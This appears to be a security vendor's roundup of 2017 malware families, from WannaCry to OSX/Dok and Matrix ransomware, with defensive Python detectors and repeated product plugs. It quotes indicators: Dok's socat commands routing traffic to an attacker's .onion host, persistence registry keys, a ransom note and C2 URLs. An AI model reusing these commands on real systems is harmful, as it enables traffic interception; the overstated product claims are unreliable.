May Ransomware

In the month of May we saw a new ransomware called May Ransomware. Once it has infiltrated a system, May encrypts various data using the AES-256 and RSA-4096 encryption algorithms and appends the “.locked” extension to filenames (for example, “sample.jpg” is renamed to “sample.jpg.locked”). May then creates a text file (“Restore_your_files.txt”) containing a ransom-demand message and places it in each folder containing encrypted files.

The message informs victims of the encryption and demands a ransom of 1 Bitcoin (approximately $1750) in exchange for file decryption. As mentioned above, May uses AES and RSA encryption and, therefore, decryption without the unique keys is impossible. All encrypted files receive the same appended extension, namely the ‘.maysomware’ and ‘.locked’ extensions.

The criminals provide each victim with a personal identification number. Presumably, the attackers keep all the IDs in some sort of database alongside the unique decryption keys, which is why victims are asked to submit this number along with the payment. Nevertheless, this does not mean that you should pay. On the contrary, you should avoid any kind of dealing with the criminals and take every possible measure to remove the May virus from your computer.

You should keep an updated antivirus program such as Max Total Security, which provides daily backups and an easy restore mechanism in case you get infected with any ransomware.

Google Play Apps Found Serving Adware

Dozens of applications available on Google Play were found delivering a strain of adware capable of collecting users’ personal information.
With these apps installed, users see a full-screen advertisement pop up at regular intervals, even when the app is closed.
The program then downloads another .dex file from cloud.api-restlet.com, which collects the following information from the user’s device:

Email address for Google account
List of apps installed
IMEI identifier and android_id
Screen resolution
Manufacturer, model, brand, OS version
SIM operator
App installation source

Researchers also found that XavirAd uses encrypted strings to avoid detection. Each class has its own decryption routine in its constructor; although the algorithm is the same, the key differs in each class.

Furthermore, the XavirAd library uses anti-sandbox techniques to hide from dynamic analysis, stopping its malicious behaviour once it detects that it is running in a testing environment. As a further safety net against being run by a tester, it also checks the user’s email address. If the email address contains the following strings, it stops:
The following Google Play apps contain XavirAd, and users may want to avoid them:
[Image: list of Google Play apps containing XavirAd]

WanaCry Ransomware

WanaCrypt, also known as WanaCry, is a new ransomware that wreaked havoc across the world last night. It spreads like a worm by leveraging a Windows SMB vulnerability (MS17-010) that Microsoft fixed in March. In these attacks, data is encrypted and the extension “.WCRY” is added to the filenames. “WannaCry” is launched through an SMBv2 remote code execution vulnerability in Microsoft Windows. The exploit (codenamed “EternalBlue”) was made available on the internet through the Shadowbrokers dump on April 14th, 2017, and was patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.

In the wake of the largest ransomware attack in history, which had already infected over 114,000 Windows systems worldwide in the last 24 hours, Microsoft took the unusual step of protecting customers with out-of-date computers: it released an emergency security patch for all its unsupported versions of Windows, including Windows XP, Vista, Windows 8, and the Server 2003 and 2008 editions. Download the patch from https://technet.microsoft.com/en-us/library/security/ms17-010.aspx .

People already infected with this ransomware will not get their files back. No new infections, however, will occur with yesterday’s strain. Currently, there is no known method of breaking the ransomware’s encryption. The only viable ways of getting files back at the moment are restoring from earlier operating system backups or, as a last resort, paying the ransom. We recommend using Max Total Security, which can restore your files from its daily backup module (Tools > Max Backup Utility). It can also detect and terminate this ransomware and stop it spreading further on your PC.

Max Total Security also has a newly introduced module in its tools collection, Tools > Max Application Whitelist, which lets you completely protect your PC from unauthorized, unwelcome executables. In normal day-to-day operation you know which programs you are going to use on your PC, so just go to this tool and allow those applications that run from the Program Files folder. System executables are already taken care of. From then on, no other executable will be allowed to run on your PC, completely protecting it from any type of Trojan.

Amnesia ransomware

The Amnesia Ransomware takes the victim’s files hostage. Ransomware Trojans like Amnesia encrypt the victim’s files with a strong encryption algorithm, so that the victim can no longer access their sensitive and personal files. It appends the .amnesia extension to the name of every encrypted file. The attacker then demands a ransom in exchange for decryption.
The files encrypted in an Amnesia Ransomware attack will no longer be readable and may show up as blank icons in Windows Explorer. Amnesia targets a wide variety of files, generally user-generated files such as spreadsheets, text documents, images, videos, music files and databases. It delivers its ransom note as a text file named ‘HOW TO RECOVER ENCRYPTED FILES.TXT’. This file alerts the victim to the attack and demands payment of a ransom to recover the encrypted files. The full text of the Amnesia ransom note:

‘YOUR FILES ARE ENCRYPTED!
Your personal ID:
[RANDOM CHARACTERS]
Attention! What happened?
Your documents, databases and other important data has been encrypted.
If you want to restore files send an email to: s1an1er111@protonmail.com
In a letter to indicate your personal identifier (see in the beginning of this document).
Attention!
* Do not attempt to remove the program or run the anti-virus tools.
* Attempts to self-decrypting files will result in the loss of your data.
* Decoders are not compatible with other users of your data, because each user’s unique encryption key.’

The best protection against Amnesia and similar ransomware threats is to keep backups of all files on an independent storage device or in the cloud, along with a reliable, fully up-to-date security program such as Max Total Security that can intercept Amnesia and similar threats before they can start an infection.

Mikoyan ransomware

The infection process of the .MIKOYAN ransomware is very similar to that of other ransomware. The malware may take advantage of massive spam campaigns that distribute malicious attachments as well as web links leading to the download of the infection files. Such e-mails are cleverly crafted to convince users to open the attachment.

Besides e-mail, the .MIKOYAN ransomware may also be spread via several other methods, such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via fake key generators or license activators uploaded to torrent websites.

Once this ransomware has become active on a computer, the .MIKOYAN virus drops its malicious payload files. They are often located in the following Windows directories:

%Common%
%AppData%
%LocalLow%
%Local%
%Roaming%
Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files under different, often randomly generated, names. After the encryption process has completed, the ransomware appends the .MIKOYAN file extension to the files it has encrypted.

To run at startup, the MIKOYAN ransomware may also modify the Windows Registry, specifically the Run and RunOnce keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

As always, we recommend that you keep an updated copy of Max Total Security on your PC, which can restore your files from its built-in daily backup. Also, 24×7 free support can help you with any issues. You can get it from here: Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses in Brazil (although nothing limits these attacks to Brazil, since they can target computers anywhere). The XPan attacks are carried out by taking advantage of poorly protected remote desktop connections. By exploiting weak passwords and security measures, the attackers can install XPan on the victims’ computers and carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals, has already affected many computers belonging to small and medium businesses in the country. Similarities between XPan and the .one ransomware were found during an in-depth analysis of the malicious program. They include the targeted file extensions, the ransom note, the commands executed before and after the encryption process, and even the criminals’ public RSA keys.

For each target file the malware generates a new, unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the CryptDeriveKey API, and encrypts the file contents using AES-256 in CBC mode with a zero IV. According to one of the victims, the criminals were asking for 0.3 bitcoin for the recovery key, using the same approach as before: the user sends a message to a mailbox with his unique ID and waits for further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. That is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. The new malware, dubbed OSX/Dok, affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administrator privileges in order to install a new root certificate on the user’s system. This lets it access all communications between the host Mac and the internet, including traffic flowing over SSL-encrypted connections.

The malware later presents the user with a security message claiming that an update is available for the system and that a password is required. Following the “update”, the malware gains full admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21st 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware copies itself to the /Users/Shared/ folder and then executes itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app                            (gives all users execute permission)
rm -fr "/Users/_%USER%_/Downloads/Dokument.app"                (deletes the original copy)
"/Users/Shared/Appstore.app/Contents/MacOS/AppStore" Dokument  (executes the application)

The malware also installs two LaunchAgents that start at system boot and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents redirect requests to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previously set PAC configuration to work (note that the configuration looks for the PAC file on the local host, 127.0.0.1).

These LaunchAgents run the following shell commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above, when the user attempts to browse the web, the browser first asks the attacker’s web page on Tor for proxy settings. The user’s traffic is then redirected through a proxy controlled by the attacker, who carries out a man-in-the-middle attack and impersonates the sites the user visits. The attacker is free to read the victim’s traffic and tamper with it in any way they please.
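As an added defensive check (not code from the original post or from Check Point), the following Python script analyses LaunchAgent plists for the two Dok artifacts described above: the two file names, and a socat forwarder that hands a local listener to a Tor hidden service. The sample plists are constructed here from the socat line quoted above.

```python
import plistlib
import re
from pathlib import Path

# LaunchAgent file names the post reports for Dok's persistence.
DOK_AGENT_NAMES = {"com.apple.Safari.proxy.plist", "com.apple.Safari.pac.plist"}
# socat SOCKS4A target of the form SOCKS4A:<proxy>:<hidden service>.onion:<port>
ONION_SOCKS = re.compile(r"SOCKS4A?:[^:\s]*:([a-z2-7]+\.onion):\d+", re.I)
# Local listener that socat binds, e.g. tcp4-LISTEN:5555,...
LISTEN_PORT = re.compile(r"tcp4?-LISTEN:(\d+)", re.I)


def analyse_launchagent(name, data):
    """Return a list of finding strings for one LaunchAgent plist given as bytes."""
    findings = []
    if name in DOK_AGENT_NAMES:
        findings.append(f"{name}: file name matches a Dok LaunchAgent")
    try:
        plist = plistlib.loads(data)
    except Exception:  # neither XML nor binary plist: worth a look on its own
        findings.append(f"{name}: unparseable plist")
        return findings
    # Join the argument vector so that both a direct socat invocation and a
    # ["/bin/sh", "-c", "/usr/local/bin/socat ..."] wrapper are covered.
    cmd = " ".join(str(a) for a in plist.get("ProgramArguments", []))
    onion = ONION_SOCKS.search(cmd)
    if "socat" in cmd and onion:
        port = LISTEN_PORT.search(cmd)
        where = f"127.0.0.1:{port.group(1)}" if port else "a local port"
        findings.append(f"{name}: socat forwards {where} to {onion.group(1)} over Tor")
    return findings


def scan_launchagents(directory):
    """Analyse every *.plist in a LaunchAgents directory; returns {path: findings}."""
    results = {}
    for path in sorted(Path(directory).glob("*.plist")):
        findings = analyse_launchagent(path.name, path.read_bytes())
        if findings:
            results[str(path)] = findings
    return results


# Constructed samples for offline use: the first rebuilds the socat line quoted
# in the post as a LaunchAgent; the second is a harmless agent for comparison.
SAMPLE_DOK_PLIST = plistlib.dumps({
    "Label": "com.apple.Safari.proxy",
    "RunAtLoad": True,
    "ProgramArguments": [
        "/usr/local/bin/socat",
        "tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1",
        "SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050",
    ],
})
SAMPLE_BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.sync",
    "RunAtLoad": True,
    "ProgramArguments": ["/usr/local/bin/sync-agent", "--daemon"],
})
```

On a Mac under investigation, call scan_launchagents(Path.home() / "Library/LaunchAgents") and review whatever it returns; an empty result only means these particular artifacts are absent.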

Beware of email attachments, and do not enter your root password when any app asks for it. Also, keep an updated copy of Mac Total Security by Max Secure Software.

MilkyDoor Android Malware

A newly discovered Android malware called MilkyDoor turns mobile devices into “walking backdoors” that give attackers access to whatever network an infected user is connected to. Affected phones essentially act as proxy servers that link legitimate networks with malicious command-and-control servers via Socket Secure (SOCKS) protocol, allowing bad actors to exfiltrate data.

It uses remote port forwarding via Secure Shell (SSH) tunnels to hide malicious traffic and give attackers access to firewall-protected networks. The malware was recently found in over 200 Android applications available through the Play Store; Google has removed them from its official app store.

In total, researchers estimate the apps had between 500,000 and 1 million installs through the Play Store alone.
While MilkyDoor appears to be DressCode’s successor, it adds a few malicious tricks of its own, among them more clandestine routines that let it bypass security restrictions and conceal its activity within normal network traffic. It does so by using remote port forwarding via an SSH tunnel over the commonly used port 22. The abuse of SSH encrypts the malicious traffic and payloads, which makes detecting the malware trickier.

We found these Trojanized apps masquerading as recreational applications ranging from style guides and children’s books to doodle applications. We surmise that these are legitimate apps which cybercriminals repackaged, Trojanized and republished on Google Play, banking on their popularity to draw victims.

MilkyDoor poses a greater risk to businesses because it is coded to attack an enterprise’s internal networks, private servers and, ultimately, corporate assets and data. The way MilkyDoor builds an SSH tunnel presents security challenges for an organization’s network, particularly in networks that integrate BYOD devices. Its stealth lies in the fact that the infected apps themselves do not request sensitive permissions and therefore exist on the device with regular or seemingly benign communication behaviour.

The repercussions are also significant. MilkyDoor can covertly grant attackers direct access to a variety of an enterprise’s services, from web and FTP to SMTP, on the internal network. That access can then be leveraged to poll internal IP addresses and scan for available, and vulnerable, servers. The recent spate of compromises of MongoDB and ElasticSearch databases, whose owners were also extorted, is a case in point: the servers were public, which was exacerbated by the lack of authentication on the databases themselves.

End users and enterprises can benefit from a mobile security solution such as Max Total Security, available on Google Play.

SMSVova Spyware -Android

SMS-based spyware, which can steal and relay a victim’s location to an attacker in real time, was downloaded between 1 and 5 million times before being pulled from Google’s official U.S. Play Store. On the Play Store the app was titled “System Update”, suggesting that users who downloaded it would receive the latest Android release.

The malware, called SMSVova, is capable of pinpointing a user’s exact geolocation and then sending that data to an attacker. However, upon installing and opening SMSVova, the app immediately quits, delivering the following message: “Unfortunately, Update Service has stopped.” The app then hides itself from the main screen.

At this point, the app enables a MyLocationService feature that tracks a user’s last known location. It also scans for SMS message commands, which the attacker sends in order to adjust malware settings and ultimately request a user’s device location. The attacker can even specifically ask to receive a location alert when the victim’s battery is running low.


Despite the error message, the spyware sets up an Android service and a broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS messages

MyLocationService fetches the user’s last known location and stores it in Shared Preferences, one of the many ways Android stores an application’s data.
IncomingSMS looks for incoming SMS messages with a particular syntax: the message must be longer than 23 characters and contain “vova-” in the SMS body. It also scans for a message containing “get faq”.

matrix9643@yahoo.com ransomware

The Matrix virus, alternatively called the matrix9643@yahoo.com ransomware, functions as a crypto-Trojan. Matrix has worm-like features that allow it to spread beyond the originally infected machine via Windows shortcuts. This malware appends the “.matrix” or “.b10cked” extension to the name of every encrypted file; for instance, “sample.jpg” is renamed to “sample.jpg.matrix”. Following successful encryption, Matrix creates a text file “matrix-readme.rtf” (newer variants drop “Readme-Matrix.rtf” or “WhatHappenedWithMyFiles.rtf”) containing the ransom-demanding message and places it in every folder.


While performing the encryption, Matrix hides a folder and then creates a shortcut with the same name. It then makes a copy of the ransomware executable and saves it as desktop.ini in the original folder.

Clicking on any shortcut will launch the malware program.
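To spot the hidden-folder-plus-shortcut lure just described, here is an added Python check (not part of the original post): it flags any desktop.ini that is really a PE executable and pairs it with a same-named .lnk beside its folder. The share snapshot it runs on is constructed for the example.

```python
import os
from pathlib import PureWindowsPath

PE_MAGIC = b"MZ"  # every Windows executable starts with this header


def walk_headers(root, nbytes=2):
    """Yield (path, first nbytes) for every regular file under root."""
    for dirpath, _subdirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    yield path, fh.read(nbytes)
            except OSError:
                continue  # unreadable or vanished: skip, do not abort the sweep


def find_matrix_lures(entries):
    """Flag the Matrix shortcut lure from (path, header_bytes) pairs.

    A desktop.ini that starts with a PE header is an executable in disguise;
    if a <folder>.lnk sits beside the folder holding it, the pair matches the
    hidden-folder-plus-shortcut trick described above. Returns sorted findings.
    """
    entries = [(PureWindowsPath(p), h) for p, h in entries]
    present = {str(p).lower() for p, _ in entries}
    findings = []
    for path, head in entries:
        if path.name.lower() != "desktop.ini" or not head.startswith(PE_MAGIC):
            continue
        folder = path.parent
        lure = folder.with_name(folder.name + ".lnk") if folder.name else None
        if lure is not None and str(lure).lower() in present:
            findings.append(f"{folder}: shortcut lure {lure.name} beside an executable desktop.ini")
        else:
            findings.append(f"{folder}: executable desktop.ini (PE header)")
    return sorted(findings)


# Constructed sample snapshot of a share: one lured folder, one clean folder.
SAMPLE_ENTRIES = [
    ("D:/share/Docs/desktop.ini", b"MZ"),              # renamed ransomware copy
    ("D:/share/Docs.lnk", b"L\x00"),                   # shortcut named like the folder
    ("D:/share/Docs/report.xlsx.matrix", b"\x00\x00"),
    ("D:/share/Pics/desktop.ini", b"[."),              # genuine [.ShellClassInfo] file
]
```

On a Windows host, run find_matrix_lures(walk_headers(r"D:\share")) over the share or profile being checked; every hit deserves a look at the folder's hidden attribute and the shortcut's target.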

Files associated with the Matrix Ransomware:
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta
%UserProfile%\AppData\Roaming\[victim_id].pek
%UserProfile%\AppData\Roaming\[victim_id].sek
%UserProfile%\AppData\Roaming\errlog.txt
%UserProfile%\AppData\Roaming\[random].cmd
%UserProfile%\AppData\Roaming\[random].afn
%UserProfile%\AppData\Roaming\[random].ast
%UserProfile%\AppData\Roaming\[random].hta
matrix-readme.rtf
Bl0cked-ReadMe.rtf
WhatHappenedWithFiles.rtf

Network Communication:
stat3.s76.r53.com.ua/addrecord.php
stat3.s76.r53.com.ua/uploadextlist.php

With the increase in everyday ransomware activity, users are strongly advised to back up their files on a daily basis to minimize data loss and to use a good antivirus program such as Max Total Security, which takes daily backups with highly configurable options.